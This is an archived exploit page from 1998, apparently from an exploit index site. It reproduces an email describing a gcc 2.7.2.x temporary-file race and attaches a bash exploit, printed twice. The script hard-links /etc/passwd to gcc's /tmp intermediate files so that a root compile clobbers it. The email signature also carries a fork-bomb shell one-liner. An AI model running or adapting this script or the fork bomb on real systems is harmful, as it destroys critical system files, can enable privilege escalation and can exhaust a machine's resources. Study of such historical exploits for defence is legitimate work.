Exploit for the gcc tempfile issue

Summary
Description:gcc 2.7.2.x (and earlier as far as I know) creates temporary files in /tmp which will follow symlinks and allows you to clobber the files of the person running gcc
Author:"Micha=B3 Zalewski" <lcamtuf@boss.staszic.waw.pl>
Compromise:Overwrite files owned by the user running gcc (possibly root )
Vulnerable Systems:Those running gcc 2.7.2.x this includes most linux, and *BSD boxes. Many admins of Solaris boxes have also added gcc. This problem is finally fixed in gcc 2.8.0
Date:16 January 1998
Notes:This has been mentioned before on Bugtraq but this is the first actual exploit I've seen.
Details

From: "Micha=B3 Zalewski" <lcamtuf@boss.staszic.waw.pl>
To: <fyodor@nmap.org>
Cc: <info@rootshell.com>, <crv@oliver.efri.hr>
Subject: GCC and /tmp
Date: Fri, 16 Jan 1998 18:58:53 +0100

Try this. Launch it as a unprivledged user in background (screen?), then,
as a root, try to compile any file or project using gcc (eg. typical
daemon, service, client), and watch out your /etc/passwd (or any other
vital file, eg. /dev/kmem, /dev/hda). Attached exploit is an improved
version of that one I previously posted onto BUGTRAQ (yesterday).

It's also possible to overwrite other user's files (if only he/she
uses gcc occassionally), system logs etc.

Vunerable platforms: any running gcc 2.7.2.x
Compromise: overwriting files, maybe root; exploitable locally.

_______________________________________________________________________
Micha=B3 Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowa=E6 jest rzecz=B1 ludzk=B1, wykonywa=E6 rekursywnie - bosk=B1 [P. De=
ustch]
=3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=3D

------=_NextPart_000_004B_01BD22B0.CAE78180
Content-Type: APPLICATION/OCTET-STREAM; NAME=gcc-exploit-2
Content-ID: <Pine.LNX.3.95.980118024921.1696D@dhp.com>
Content-Description: 

#!/bin/bash

# Simple GCC exploit (tested under 2.7.2.3.f.1)
# - by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ---------------------------------------------
# Usage: "screen ./gcc_ln" then Ctrl+A,D
# ---------------------------------------------
# Ugh, blah... Should be written in C for
# better performance, but I have no time :)

VICTIM=/etc/passwd

if [ ! -f $VICTIM ]; then
  echo "I can't see my victim ($VICTIM)..."
  exit 0
fi

ORIG=`ls -l $VICTIM|awk '{print \$5}'`

echo "GCC exploit launched against $VICTIM ($ORIG bytes)."

renice +20 $PPID >&/dev/null

cd /tmp

while [ 1 ]; do

  V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
  
  if [ ! "$V" = "" ]; then
    ln $VICTIM ${V}.s &>/dev/null
    ln $VICTIM ${V}1.o &>/dev/null
    NOWY=`ls -l $VICTIM|awk '{print \$5}'`
    if [ "$ORIG" = "$NOWY" ]; then
      echo -n "."
      rm -f ${V}.s ${V}1.o &>/dev/null
    else
      echo "Voila. I'm so smart."
      rm -f ${V}.s ${V}1.o &>/dev/null
      exit 0
    fi
  fi

done

------=_NextPart_000_004B_01BD22B0.CAE78180--

#!/bin/bash

# Simple GCC exploit (tested under 2.7.2.3.f.1)
# - by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ---------------------------------------------
# Usage: "screen ./gcc_ln" then Ctrl+A,D
# ---------------------------------------------
# Ugh, blah... Should be written in C for
# better performance, but I have no time :)

VICTIM=/etc/passwd

if [ ! -f $VICTIM ]; then
  echo "I can't see my victim ($VICTIM)..."
  exit 0
fi

ORIG=`ls -l $VICTIM|awk '{print \$5}'`

echo "GCC exploit launched against $VICTIM ($ORIG bytes)."

renice +20 $PPID >&/dev/null

cd /tmp

while [ 1 ]; do

  V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
  
  if [ ! "$V" = "" ]; then
    ln $VICTIM ${V}.s &>/dev/null
    ln $VICTIM ${V}1.o &>/dev/null
    NOWY=`ls -l $VICTIM|awk '{print \$5}'`
    if [ "$ORIG" = "$NOWY" ]; then
      echo -n "."
      rm -f ${V}.s ${V}1.o &>/dev/null
    else
      echo "Voila. I'm so smart."
      rm -f ${V}.s ${V}1.o &>/dev/null
      exit 0
    fi
  fi

done

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]